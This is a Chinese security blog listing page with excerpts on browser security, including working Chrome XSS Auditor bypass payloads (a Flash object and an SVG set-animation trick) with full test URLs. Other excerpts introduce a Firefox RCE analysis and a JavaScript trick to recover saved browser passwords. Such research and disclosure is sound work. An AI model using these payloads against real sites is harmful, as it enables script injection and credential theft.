浏览器安全一 / Chrome XSS Auditor bypass

作者: 分类: web前端 时间: 2016-1-16 1:18 评论: 2条评论 浏览: 5427人看过 标签: 浏览器 fliter

私藏比较久的干货,严禁转载。

(2017-01-04 更新)

Bypass 3 via flash

只要支持flash的chrome版本(最新版Chrome 5),均可使用。
context == support flash

<object allowscriptaccess=always> <param name=url value=http://mhz.pw/game/xss/alert.swf> 

test

http://mhz.pw/game/xss/xss.php?xss=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=http://mhz.pw/game/xss/alert.swf%3E


Universal Bypass 2

最新版(Chrome 55/56)无任何条件,只要输出在页面中即可执行代码。
context == null

?xss=<svg><set href=#script attributeName=href to=data:,alert(document.domain) /><script id=script src=foo></script> 

test

http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Cset%20href=%23script%20attributeName=href%20to=data:,alert(document.domain)%20/%3E%3Cscript%20id=script%20src=foo%3E%3C/script%3E

阅读全文>>

Firefox 31~34远程命令执行漏洞的分析

作者: 分类: 网络安全 时间: 2015-3-27 21:39 评论: 5条评论 浏览: 3441人看过 标签: 浏览器 命令执行漏洞

    这是我根据Tod Beardsley在metsaploit上发表的一篇文章,翻译+测试完成的分析,因为最近在研究浏览器漏洞,所以会更加关注浏览器这块。

    前段时间,二哥在很多浏览器中将脚本层面的漏洞提升为远程命令执行,几乎日遍市面上所有国产浏览器,这成为了许多人津津乐道的话题。确实,在当今这个底层安全防护越来越强的环境下,堆栈溢出、UAF造成的漏洞利用起来变得很困难,但如果借助浏览器提供的一些脚本层接口做到RCE,将是一个四两拨千金的过程。

    CVE-2014-8638就是这样一个漏洞,而且影响到的不是国(shan)产(zhai)浏览器,而是大名鼎鼎的Firefox。它也是javascript逐步进入ECMAScript 6时代后遇到的一个比较有意思的漏洞。

    0x01 漏洞的发现


阅读全文>>

Chrome XSS Auditor Bypass Using SVG

作者: 分类: 网络安全 时间: 2015-2-11 21:58 评论: 0条评论 浏览: 5436人看过 标签: 浏览器 fliter audit

    除了之前MK发布的一个bypass方法外(https://twitter.com/avlidienbrunn/status/486059626002395136),大牛们也陆续想出来一些针对性的绕过方法。我说的这个出自:http://www.thespanner.co.uk/2015/02/10/xss-auditor-bypass/

    应用场景出现在,输出点在<script>中的引号中,不能闭合引号(如使用了addslashes转义),但可以用</script>闭合整个script标签。

    我写了一个应用场景:http://mhz.pw/game/audit/xss.php?name=test ,源码如下:

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta charset="utf-8"/>
<tit...


阅读全文>>

如何简单地找回保存在浏览器里的密码

作者: 分类: 资源分享 时间: 2014-6-19 8:41 评论: 11条评论 浏览: 4468人看过 标签: 找回密码 浏览器

    一个简单的议题,也是同学们比较常遇到的问题,怎样找回保存在浏览器的“自动填写表单”功能中的密码。最容易想到的当然是抓包。一般的网站数据包里密码就是明文的,不过有些却也不是,可能是经过hash之后传递的(多数大网站)。

    还有些浏览器自带此功能,但总有诸多限制。比如chrome需要输入当前windows密码:

    0011.jpg

    猎豹浏览器需要输入之前设置的手势安全锁:

    0012.jpg

    真蛋疼是吧。

    这里给一个小技巧,利用javascript来获取当前保存的密码,多浏览器通用的,简单又实用。

    我平时多用猎豹浏览器,这里先用猎豹做个例子吧。dnspod应该是安全性要求很高的一个网站了,从域名的https就可以看出。那么,我现在就来找回一下保存在猎豹浏览器中的dnspod密码。

   ...

阅读全文>>

Top ↑ sitemap More